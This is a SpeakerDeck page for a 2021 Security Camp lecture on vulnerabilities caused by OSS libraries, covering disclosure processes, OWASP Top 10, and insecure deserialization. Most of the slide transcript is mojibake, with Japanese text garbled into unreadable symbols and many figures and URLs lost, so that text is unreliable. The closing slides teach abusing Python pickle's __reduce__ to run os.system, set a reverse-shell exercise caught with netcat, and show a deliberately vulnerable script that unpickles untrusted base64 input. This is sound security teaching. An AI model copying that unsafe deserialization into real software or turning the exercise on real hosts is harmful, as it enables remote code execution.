Upgrade to Pro — share decks privately, control downloads, hide ads and more …

趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

@tkmru
September 19, 2021
Programming
0
4.8k

 趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

GitHubリポジトリ:
https://github.com/tkmru/seccamp2021-b5

講義紹介ページ:
https://www.ipa.go.jp/jinzai/camp/2021/zenkoku2021_program_list.html#list_b5

@tkmru

September 19, 2021
Tweet

More Decks by @tkmru

See All by @tkmru
ipa-medit: Memory search and patch tool for IPA without Jailbreaking/ipa-medit-bh2022-europe
tkmru
0
270
Ipa-medit: Memory modification tool for iOS apps without Jailbreaking/ipa-medit-codeblue2022
tkmru
0
140
Ipa-medit: Memory Search and Patch Tool for IPA Without Jailbreaking @Black Hat USA 2021 Arsenal/ipa-medit-bh2021-usa
tkmru
1
4.2k
Learn the essential way of thinking about vulnerabilities through post-exploitation on middlewares (MySQL/PostgreSQL編)/seccamp2020-b8
tkmru
3
820
apk-medit: memory search and patch tool for debuggable APK @CODE BLUE 2020 Bluebox
tkmru
0
190
apk-medit: memory search and patch tool for debuggable APK @Black Hat USA 2020 Arsenal/apk-medit-bh2020-usa
tkmru
0
4k
めんどうくさいゲームセキュリティ
tkmru
20
10k
Linux Rootkit Internals
tkmru
1
1.9k
Unicornを用いたDead Code除去
tkmru
0
210

Other Decks in Programming

See All in Programming
AWS IaCの注目アップデート 2024年10月版
konokenj
3
3.1k
Webの技術スタックで マルチプラットフォームアプリ開発を可能にするElixirDesktopの紹介
thehaigo
2
930
Honoの来た道とこれから
yusukebe
19
3k
Content Security Policy入門 セキュリティ設定と 違反レポートのはじめ方 / Introduction to Content Security Policy Getting Started with Security Configuration and Violation Reporting
uskey512
1
440
CSC509 Lecture 08
javiergs
PRO
0
110
Dev ContainersとGitHub Codespacesの素敵な関係
ymd65536
1
130
色々なIaCツールを実際に触って比較してみる
iriikeita
0
270
『ドメイン駆動設計をはじめよう』のモデリングアプローチ
masuda220
PRO
8
440
Piniaの現状と今後
waka292
5
1.5k
Why Spring Matters to Jakarta EE - and Vice Versa
ivargrimstad
0
1k
Sidekiqで実現する 長時間非同期処理の中断と再開 / Pausing and Resuming Long-Running Asynchronous Jobs with Sidekiq
hypermkt
6
2.7k
Hotwire or React? ~Reactの録画機能をHotwireに置き換えて得られた知見~ / hotwire_or_react
harunatsujita
9
4.1k

Featured

See All Featured
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
46
2.1k
Reflections from 52 weeks, 52 projects
jeffersonlam
346
20k
Build The Right Thing And Hit Your Dates
maggiecrowley
32
2.4k
The Cult of Friendly URLs
andyhume
78
6k
Designing for Performance
lara
604
68k
KATA
mclloyd
29
13k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.1k
Building Better People: How to give real-time feedback that sticks.
wjessup
363
19k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
41
2.1k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
28
7.9k
Bootstrapping a Software Product
garrettdimon
PRO
305
110k

Transcript

  1. झຯͱ࣮ӹͷͨΊͷ ஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯ גࣜձࣾΞΧπΩ খ஛ɹହҰ

  2. ࣗݾ঺հ w খ஛ɹହҰ w (JU)VC5XJUUFSULNSV w ॴଐגࣜձࣾΞΧπΩ w ੬ऑੑ਍அ w

    νʔτରࡦπʔϧ։ൃͳͲ 

  3. ࣗݾ঺հ ஶॻ

  4. ηΩϡϦςΟɾΩϟϯϓͱͳ͔Α͠ʂ w ηΩϡϦςΟɾΩϟϯϓશࠃେձࢀՃ w ηΩϡϦςΟɾϛχΩϟϯϓJOژ౎νϡʔλʔ w ηΩϡϦςΟɾϛχΩϟϯϓJOਆށνϡʔλʔ w ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ w

    ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ ࣗݾ঺հ 

  5. #MBDL)BU"STFOBMͱ΋ͳ͔Α͠ʢʁʣ w #MBDL)BU64""STFOBM w "OESPJEΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮBQLNFEJUʯΛൃද w #MBDL)BU64""STFOBM w J04ΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮJQBNFEJUʯΛൃද w

    #MBDL)BU&VSPQF"STFOBM w 5#" ࣗݾ঺հ 

  6. ຊ೔ͷߨٛʹ͍ͭͯ  w ԋश؀ڥߏஙͷͨΊͷίϚϯυͷ৘ใ͕εϥΠυʹࡌ͍ͬͯΔͷͰίϐϖͰ ߏஙͰ͖ΔΑ͏ʹεϥΠυ͸4MBDL্Ͱ഑෍ͯ͋͠Γ·͢ w ԋशͷͱ͖͸֤ࣗͰεϥΠυ͔͞ͷ΅Γͭͭ΍ͬͯ΋Β͑Δͱ🙏 w ޙ೔ެ։൛Λ4QFBLFS%FDLͰެ։͢ΔͷͰݟֶ࿮ͷਓͨͪ͸ ଴͍ͬͯͯͩ͘͞🙇

    w (JU)VCϦϙδτϦ w IUUQTHJUIVCDPNULNSVTFDDBNQC

  7. ຊ೔ͷߨٛʹ͍ͭͯ 

  8. ຊ೔ͷߨٛʹ͍ͭͯ ӕͰ͢ʢҰ෦ʣ 

  9. ຊ೔ͷߨٛʹ͍ͭͯ w ߨٛ֓ཁΛߟ͑ͨͷ͸໿ϲ݄લʜ w ౰࣌͸9.-ύʔαʹओ࣠Λ͓͍ͨߨٛΛ͠Α͏ͱࢥ͍ͬͯͨ w ͋ͱͰߟ͑௚͢ͱগ͠είʔϓ͕ڱ͍ w ͱ͍͏͜ͱͰɺѻ͏੬ऑੑΛ૿΍͍ͯ͠·͢ʂ 

  10. ͦ΋ͦ΋੬ऑੑͱ͸ w ιϑτ΢ΣΞʹ͓͚ΔηΩϡϦςΟ্ͷ໰୊Օॴ w ιϑτ΢ΣΞͷྫϥΠϒϥϦɺ04ɺ8FCΞϓϦέʔγϣϯͳͲ w ໰୊ՕॴΛ߈ܸ͞ΕΔ͜ͱͰɺຊདྷͷػೳΛଛͳ͍ɺϢʔβ͕ෆརӹΛඃΔ w ৘ใͷ࿙ӮͳͲ w

    ˠ੬ऑੑΛ߈ܸऀΑΓૣ͘ൃݟͯ͠मਖ਼͍ͯ͘͠ඞཁ͕͋Δʂʂ 

  11. ຊ೔ͷߨٛͷྲྀΕ w ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢલ࠲ʣ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w 9.-ύʔαʹର͢Δ߈ܸख๏ w ٕज़ͱ޲͖߹͏࢟੎ͷ࿩ʢ͍͍࿩ʣ 

  12. ୈ̍ষ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε

  13. ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε w اۀͰߦΘΕΔ੬ऑੑ਍அ w ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 

  14. اۀͰߦΘΕΔ੬ऑੑ਍அ w ηΩϡϦςΟΤϯδχΞ͕੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱΛ੬ऑੑ਍அͱ͍͏ w αʔϏεͷϦϦʔεલ΍ɺ௥ՃͰେ͖ͳػೳΛ࣮૷ͨ͠ࡍʹߦΘΕΔ w 8FCΞϓϦέʔγϣϯ΍εϚϗΞϓϦɺ*P5ػثͳͲ͕ର৅ w ηΩϡϦςΟϕϯμʹ֎஫ɺ·ͨ͸಺੡Ͱ࣮ࢪ͞ΕΔ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̍ʣ

    

  15. اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ੬ऑੑΛൃݟ͢Δʹ͸༷ʑͳ؍఺͕͋Δ͕ɺΞϓϦέʔγϣϯͱαʔόؒͷ ௨৴Λ֬ೝɾվ͟Μ͢Δ͜ͱͰൃݟͰ͖Δ੬ऑੑ͕ଟ͍ ϓϩΩγπʔϧΛ࢖ͬͯ௨৴಺༰Λ֬ೝ͢Δ ηΩϡϦςΟΤϯδχΞ αʔό ਍அର৅ 

  16. اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ηΩϡϦςΟΤϯδχΞ͕ݟ͚ͭͨ੬ऑੑΛ։ൃऀʹใࠂ w ։ൃऀ͕ΞϓϦέʔγϣϯΛमਖ਼ ηΩϡϦςΟΤϯδχΞ ใࠂΛड͚ͯ੬ऑੑΛमਖ਼͢Δ։ൃऀ ηΩϡΞͳঢ়ଶͰαʔϏεΛϦϦʔε 

  17. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ݚڀ໨తͰ͋ͬͨΓझຯͰ͋ͬͨΓͰɺੈͷதʹެ։͞Ε͍ͯΔιϑτ΢Σ Ξͷ੬ऑੑΛউखʹݟ͚ͭΔਓ͕͍ͨͪΔ w ൃݟͨ͠੬ऑੑ͕ެ։͞ΕΔͱݟ͚ͭͨਓͷ੒ՌͱͳΔͷͰ͏Ε͍͠ w ͓ۚ💰͕΋Β͑Δ੍౓΋͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̎ʣ 

  18. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂऀʹใ঑ۚΛ౉͢όάό΢ϯςΟ w ࣗࣾͷ੡඼ͷ੬ऑੑΛใࠂͯ͘͠Εͨਓʹ੬ऑੑͷӨڹ౓ʹ४ͯ͡ใ঑ۚΛ ౉੍͢౓ w ੬ऑੑΛѱ༻͞ΕΔΑΓɺใ঑ۚΛ͔͚ͯͰ΋ใࠂͯ͠΋Βͬͨ΄͏͕͍͍ w ੬ऑੑ਍அͱҧͬͯຊ൪؀ڥʹ߈ܸߦҝ͕ߦΘΕΔ w

    اۀ͕ηΩϡϦςΟରࡦʹ஫ྗ͍ͯ͠Δ͜ͱͷ13ʹ΋ͭͳ͕Δ 

  19. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ஶ໊όάό΢ϯςΟαʔϏε w )BDLFS0OF w 4UBSCVDLTɺ/JOUFOEPɺ-*/&ɺ50:05"ͳͲ w CVHDSPXE w *OEFFEɺ/FUqJYɺ5FTMBɺ.BTUFSDBSEͳͲ

    w #VH#VOUZKQ w $IBUXPSLɺCJUCBOLͳͲ 

  20. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ w όάό΢ϯςΟΛ΍͍ͬͯͳ͍αʔϏε΍ɺ044ͷιϑτ΢ΣΞͷ੬ऑੑΛ ݟ͚ͭͯ͠·͏ʢݟ͚͍ͭͨʢʁʣʣ͜ͱ΋͋Δ w ͦΜͳͱ͖͸*1"ʹใࠂ͢Δͱ։ൃऀ΁ͷ࿈བྷΛߦͬͯ͘ΕΔ w ੬ऑੑؔ࿈৘ใͷಧग़ड෇ ʢIUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUʣ

    w ։ൃऀͱ௚઀΍ΓऔΓ͢ΔͱᎍΊΔՄೳੑ͕͋Δ 

  21. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

  22. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂͨ͠੬ऑੑʹ$7&͕ͭ͘͜ͱ΋ w $7&ʢ$PNNPO7VMOFSBCJMJUJFTBOE&YQPTVSFTʣɿڞ௨੬ऑੑࣝผࢠ w .*53&͕ࣾ৘ใڞ༗ͷͨΊʹ֤੬ऑੑʹݻ༗ͷ$7&*%ΛׂΓৼ͍ͬͯΔ w ੲɺ֤छ੡඼ϕϯμʔ΍ηΩϡϦςΟϕϯμʔ͕ɺ੬ऑੑʹରͯ͠ಠࣗʹ ໊લΛ෇͚͍ͯͨ w

    ೥ʹ$7&͕ొ৔͠ɺ੬ऑੑ৘ใͷൺֱΛ༰қʹߦ͑ΔΑ͏ʹͳͬͨ w ݟ͚ͭͨ੬ऑੑʹ$7&͕ͭ͘ͱࣗຫͰ͖Δ 

  23. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ੬ऑੑʹ$7&͕ͭ͘·ͰͷྲྀΕ w ೔ຊͰ͸*1"ͱ+1$&35$$͕.*53&ࣾͱ࿈ܞͯ͠ݟ͔ͭͬͨ੬ऑੑʹରͯ͠ $7&Λ࠾൪͢ΔऔΓ૊ΈΛߦ͍ͬͯΔ 

  24. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ͜͜·Ͱݟ͖ͯͨͱ͓Γɺ੬ऑੑ͸೔ʑൃݟ͞Ε͍ͯΔ w ੬ऑੑͷ͋Διϑτ΢ΣΞΛ༻͍͍ͯΔ͚ͩͰ੬ऑੑͱͳΓ͏Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ  IUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUWVMORIUNM

  25. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ਵ࣌ൃݟ͞ΕΔϥΠϒϥϦ΍04౳ͷ੬ऑੑʹ͸ϦϦʔεલʹ࣮ࢪ͢Δ ੬ऑੑ਍அͰ͸ରԠͰ͖ͳ͍ w ӡ༻޻ఔͰ੬ऑੑͷରԠΛ͢Δඞཁ͕͋Δ w ੬ऑੑͷରࡦํ๏͕ެ։͞ΕΔલʹɺ߈ܸ͕ߦΘΕΔ͜ͱ΋͋ΔʢθϩσΠ ߈ܸʣ w

    Өڹ౓͕ߴ͍੬ऑੑ͕ެ։͞Εͨ৔߹͸ਝ଎ʹରԠ͢Δඞཁ͕͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ 

  26. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ӡ༻࣌ʹ੬ऑੑͷ͋Διϑτ΢ΣΞ͕͋Ε͹Ξοϓσʔτ͍͖͍ͯͨ͠ w ˠαʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w ˠίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ 

  27. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ αʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w 7VMTʢ76-OFSBCJMJUZ4DBOOFSʣ w IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT w ϑϡʔνϟʔגࣜձ͕ࣾ։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w αʔό಺Ͱ༻͍͍ͯΔιϑτ΢ΣΞʹ੬ऑੑΛؚΉόʔδϣϯͷ΋ͷ͕ͳ͍͔

    ֬ೝ 

  28. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 7VMTͷ࢓૊Έ IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT 

  29. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ w "RVB4FDVSJUZ͕։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w IUUQTHJUIVCDPNBRVBTFDVSJUZUSJWZ w %PDLFSΠϝʔδΛεΩϟϯͰ͖Δ w ϝϯς͞Ε͍ͯͳ͍ެࣜ%PDLFSΠϝʔδ΋ଟ͍

    w "4JNQMFBOE$PNQSFIFOTJWF7VMOFSBCJMJUZ4DBOOFSGPS$POUBJOFST  4VJUBCMFGPS$* w $*ʹ૊ΈࠐΉ͜ͱ΋Ͱ͖ͯศར 

  30. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ Ϋϥ΢υ؀ڥͷઃఆ΋νΣοΫ͍ͨ͠ w "84΍($1ͷઃఆϛεʹΑΔ੬ऑੑ΋͋Δ w ೔ʑɺΠϯϑϥͷઃఆ͸มΘ͍ͬͯ͘ͷͰɺϦϦʔεલͷ੬ऑੑ਍அͰ͸ ๷͛ͳ͍ w ੬ऑͳ෦෼Λ߈ܸऀ͸CPUΛ༻͍ͯߴ଎ʹ୳ͯ͘͠Δ 

  31. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 4όέοτ͸Α͘ૂΘΕ͍ͯΔ w Α͘ૂΘΕ͍ͯΔ"84ͷ࢓૊Έͷͻͱͭʹ4όέοτ͕͋Δ w ਖ਼໊ࣜশ"NB[PO4 "NB[PO4JNQMF4UPSBHF4FSWJDF  w Πϯλʔωοτܦ༝Ͱར༻Ͱ͖ΔετϨʔδαʔϏε

    w 4όέοτσʔλͷஔ͖৔ॴ w ੩తϑΝΠϧϗεςΟϯά͕Ͱ͖8FCαʔόͱͯ͠΋࢖༻Ͱ͖Δ w ༷ʑͳσʔλ͕ஔ͔ΕΔͷͰɺσʔλ͕ཉ͍͠߈ܸऀʹૂΘΕΔ 

  32. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ࡢࠓͷΠϯγσϯτࣄྫ w 4όέοτઃఆϛεʹΑΔԯສੈଳҎ্ͷݸਓ৘ใ࿙Ӯ w ΧϦϑΥϧχΞΛڌ఺ͱ͢Δσʔλ෼ੳձࣾͰ͋Δ"MUFSZY͔ࣾΒͷ࿙Ӯ w IUUQTXXXUSFOENJDSPDPNWJOGPQMTFDVSJUZOFXTWJSUVBMJ[BUJPOBOEDMPVEEBUBPONJMMJPOVT IPVTFIPMETFYQPTFEEVFUPNJTDPOpHVSFEBXTTCVDLFU w

    ެ։4όέοτΛɺϚϧ΢ΣΞΛ࢓ࠐΜͩঢ়ଶͰ্ॻ͖͢Δ߈ܸऀ w ޡͬͯॻ͖ࠐΈΛڐՄ͞Ε͍ͯΔόέοτʹϚϧ΢ΣΞΛॻ͖ࠐΈ w IUUQTXXXNDBGFFDPNCMPHTFOUFSQSJTFDMPVETFDVSJUZNDBGFFEJTDPWFSTHIPTUXSJUFSBQFSWBTJWFBXTT NBOJOUIFNJEEMFFYQPTVSF 

  33. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ "84$POpH w "84ͷ֤छઃఆ͕ϧʔϧͲ͓Γʹઃఆ͞Ε͍ͯΔ͔ධՁ͢ΔαʔϏε w ެ։͞Ε͍ͯΔηΩϡϦςΟάϧʔϓ͕ଘࡏ͠ͳ͍͔ʁ w 4όέοτ͕ެ։ઃఆʹͳ͍ͬͯͳ͍͔ʁ w ެ։͞Ε͍ͯΔ&#43%4εφοϓγϣοτ͕ଘࡏ͠ͳ͍͔ʁ

    

  34. ͲͷΑ͏ͳ੬ऑੑ͕ݟ͔ͭΔͷ͔

  35. 08"415PQ 08"41ͱ͸ w 08"41ʢ0QFO8FC"QQMJDBUJPO4FDVSJUZ1SPKFDUʣ͸ηΩϡϦςΟͷ ܒ໤ͱීٴΛ໨తͱͨ͠/10ஂମ w ੈքதʹڌ఺͕͋Δ w ೔ຊʹ΋͋ͬͯυΩϡϝϯτΛެ։ͨ͠ΓษڧձΛओ࠵ͨ͠Γ͍ͯ͠Δ w

    IUUQTPXBTQPSHXXXDIBQUFSKBQBO w 08"415PQ͸8FCΞϓϦέʔγϣϯʹ͓͍ͯ Α͘ݟ͔ͭΔ੬ऑੑϥϯΩϯά 

  36. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΠϯδΣΫγϣϯ߈ܸ w ೝূͷෆඋ w ػඍͳ৘ใͷ࿐ग़ w 99&

    w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳηΩϡϦςΟઃఆ w 944 w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτ ͷ࢖༻ w ෆे෼ͳϩΪϯάͱϞχλϦϯά 

  37. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ  IUUQTHJUIVCDPN08"415PQCMPCNBTUFSEPDT"@@*OUSPEVDUJPONE

  38. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳ҉߸Խ w ΠϯδΣΫγϣϯ w ҆શͰͳ͍ઃܭ

    w ෆద੾ͳηΩϡϦςΟઃఆ w ੬ऑͳݹ͍ίϯϙʔωϯτ w ෆద੾ͳ*EFOUJpDBUJPOͱ "VUIFOUJDBUJPO w ιϑτ΢ΣΞͱσʔλͷ੔߹ͷෆඋ w ηΩϡϦςΟϩάͱϞχλϦϯάͷෆ උ w αʔόʔαΠυϦΫΤετϑΥʔδΣϦ ʢ443'ʣ 

  39. ߨٛͰѻ͏੬ऑੑ w ୊झຯͱ࣮ӹͷͨΊͷஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ w 044ϥΠϒϥϦىҼͱ͍ͬͯ΋෯޿͍ʜ w ֤ϓϩάϥϛϯάݴޠʹσϑΥϧτͰଘࡏ͢ΔϥΠϒϥϦىҼͷ੬ऑੑʹয ఺Λ౰ͯΔˠ࡞Γࠐ·Ε΍͍͢ʂʂ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ

    w 9.-ύʔαؔ࿈ 

  40. 08"415PQ 08"41ʹΑΔ΍ΒΕ؀ڥ w 08"41͸੬ऑੑΛ࡞Γࠐ·Εͨԋश༻ͷΞϓϦͷެ։΋͍ͯ͠Δ w +VJDF4IPQʢIUUQTHJUIVCDPNCLJNNJOJDIKVJDFTIPQʣ w 3BJMT(PBUʢIUUQTHJUIVCDPN08"41SBJMTHPBUʣ w %74"ʢIUUQTHJUIVCDPN08"41%74"ʣ

    w ͳͲ w ษڧʹͳΔͷͰ΍ͬͯΈ͍ͯͩ͘͞ʂ 

  41. ୈ̎ষ ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ

  42. γϦΞϥΠζͱσγϦΞϥΠζ γϦΞϥΠζͱ͸ w γϦΞϥΠζ ഑ྻ΍ΫϥεͳͲͷΦϒδΣΫτΛόΠτྻܗࣜͷσʔλ΁มߋ͢Δ͜ͱ w σγϦΞϥΠζʢΞϯγϦΞϥΠζʣ γϦΞϥΠζ͞ΕΔ͜ͱʹΑͬͯੜ੒͞ΕͨόΠτྻܗࣜͷσʔλΛ ΦϒδΣΫτ΁໭͢͜ͱ w

    ༻్ ෳࡶͳσʔλ΍ΦϒδΣΫτͳͲͷεφοϓγϣοτΛऔΔ ϑΝΠϧ΍%#ʹอଘ͢Δࡍ΍ɺωοτϫʔΫΛ௨ͯ͡ૹ৴͢ΔͳͲ 

  43. 1ZUIPOͰͷγϦΞϥΠζσγϦΞϥΠζ w QJDLMFϞδϡʔϧͷQJDLMFEVNQT ɺQJDLMFMPBET ͳͲͰ γϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ  { 'name':

    'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ', 'year': 2021, 'place': ‘online' } b'\x80\x04\x95k\x00\x00\x00\x00\x00\x00\x00}\x94( \x8c\x04name\x94\x8cA\xe3\x82\xbb\xe3\x82\xad\xe3 \x83\xa5\xe3\x83\xaa\xe3\x83\x86\xe3\x82\xa3\xe3\ x83\xbb\xe3\x82\xad\xe3\x83\xa3\xe3\x83\xb3\xe3\x 83\x97\xe5\x85\xa8\xe5\x9b\xbd\xe5\xa4\xa7\xe4\xb c\x9a2021 \xe3\x82\xaa\xe3\x83\xb3\xe3\x83\xa9\xe3\x82\xa4\ xe3\x83\xb3\x94\x8c\x04year\x94M\xe5\x07\x8c\x05p lace\x94\x8c\x06online\x94u.’

  44. 1)1ͰͷγϦΞϥΠζσγϦΞϥΠζ w ඪ४ؔ਺ͷTFSJBMJ[F ͱVOTFSJBMJ[F ͰγϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ  array( 'name'=>'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ’,

    'year'=>2021, 'place'=>'online' ) a:3:{s:4:"name";s:65:"ηΩϡϦςΟɾΩϟϯϓશࠃେձ 2021 ΦϯϥΠ ϯ”;s:4:”year";i:2021;s:5:"place";s:6:"online";}

  45. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ Ϣʔβ͔Βͷೖྗ஋͸ཁ஫ҙ w Ϣʔβ͔Βͷೖྗ஋Λͦͷ··σγϦΞϥΠζ͍ͯ͠Δͱɺ ੜ੒͞ΕΔΦϒδΣΫτΛϢʔβ͕ίϯτϩʔϧͰ͖ͯ͠·͏  ࡉ޻͞ΕͨσʔλΛૹ৴ ߈ܸऀ͕ࢦఆͨ͠ ΦϒδΣΫτ͕ੜ੒͞ΕΔ

  46. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ϚδοΫϝιουΛ࢖͏ w ϚδοΫϝιουಛఆͷΠϕϯτ࣌ʹ҉໧తʹ࣮ߦ͞ΕΔϝιου w ϓϩάϥϛϯάݴޠ಺෦Ͱ࣮ߦ͞Ε͍ͯΔ w ֤ݴޠʹΑͬͯҟͳΔ w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹݺͼग़͞ΕΔϚδοΫϝιουΛ߈ܸʹར༻Մೳ

    w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹ࣮ߦ͢ΔίʔυΛࢦఆͰ͖Δ w ˠϢʔβ͕೚ҙίʔυΛ࣮ߦՄೳʂ 

  47. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1ZUIPOެࣜυΩϡϝϯτ  IUUQTEPDTQZUIPOPSHKBMJCSBSZQJDLMFIUNM

  48. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1)1ެࣜυΩϡϝϯτ  IUUQTXXXQIQOFUNBOVBMKBGVODUJPOVOTFSJBMJ[FQIQ

  49. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ۩ମతͳ߈ܸํ๏ʢ1ZUIPOͷ৔߹ʣ w 1ZUIPOͰγϦΞϥΠζσγϦΞϥΠζ͸QJDLMFԽVOQJDLMFԽͱݺ͹Ε͍ͯΔ w QJDLMFEVNQT Λ࢖ͬͯΦϒδΣΫτΛQJDLMFԽ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ͠@@SFEVDF@@ ϝιου͕஌ΒΕ͍ͯΔ

    w ݺͼग़͠ՄೳͳΦϒδΣΫτͱҾ਺Λλϓϧͱͯ͠ࢦఆ͢Δͱ࣮ߦͯ͘͠ΕΔ w ˠ@@SFEVDF@@ ϝιουͰPTTZTUFN Λ࣮ߦ͢ΔΦϒδΣΫτΛQJDLMFԽͯ͠ ૹ৴͢Δ͜ͱͰ೚ҙίʔυ࣮ߦʹ࣋ͪࠐΊΔʂ 

  50. ࣄલ՝୊݉બߟ՝୊& w 1ZUIPOʹ͸QJDLMFͱ͍͏ඪ४Ϟδϡʔϧ͕͋Γ·͢ɻQJDLMFͷެࣜυΩϡϝϯτʹهࡌ͞ Ε͍ͯΔΑ͏ʹɺQJDLMFͰ৴པͰ͖ͳ͍஋ΛσγϦΞϥΠζ͢Δ͜ͱ͸੬ऑੑͷݪҼͱͳ Γಘ·͢ɻͦͷཧ༝͓Αͼ߈ܸख๏ʹ͍ͭͯɺҎԼͷখ໰   ʹճ౴͍ͯͩ͘͠͞ɻ w খ໰

      Կނɺ੬ऑੑͱͳΔͷ͔Λઆ໌͍ͯͩ͘͠͞ʢඞਢճ౴ʣ w খ໰   ҎԼͷ1ZUIPOͷιʔείʔυʹ͸্هͷ੬ऑੑ͕ଘࡏ͠·͢ɻ ͜ͷ੬ऑੑΛ༻͍ͯɺ5$1ͷ൪ϙʔτʹର͢ΔϦόʔεγΣϧΛ࡞੒͍ͯͩ͘͠͞ɻ OFUDBUͰ൪ϙʔτΛ଴ͪड͚͓͖ͯɺ઀ଓཱ͕֬ͨ͠ޙɺMTͳͲͷίϚϯυΛଧͪࠐ Έ݁Ռ͕ฦͬͯ͘Ε͹ਖ਼ղͰ͢ɻʢҰ෦লུʣʢඞਢճ౴ʣ  ໰୊จ

  51. બߟ՝୊&  #!/usr/bin/env python3 # coding: UTF-8 import sys import

    base64 import pickle args = sys.argv if len(args) != 2: print('ୈҰҾ਺ʹBase64Τϯίʔυ͞ΕͨจࣈྻΛࢦఆ͍ͯͩ͘͠͞') try: data = base64.urlsafe_b64decode(args[1]) deserialized = pickle.loads(data) print('deserialized: {0}'.format(deserialized)) except: print('Failed to deserialize') ໰୊ίʔυ

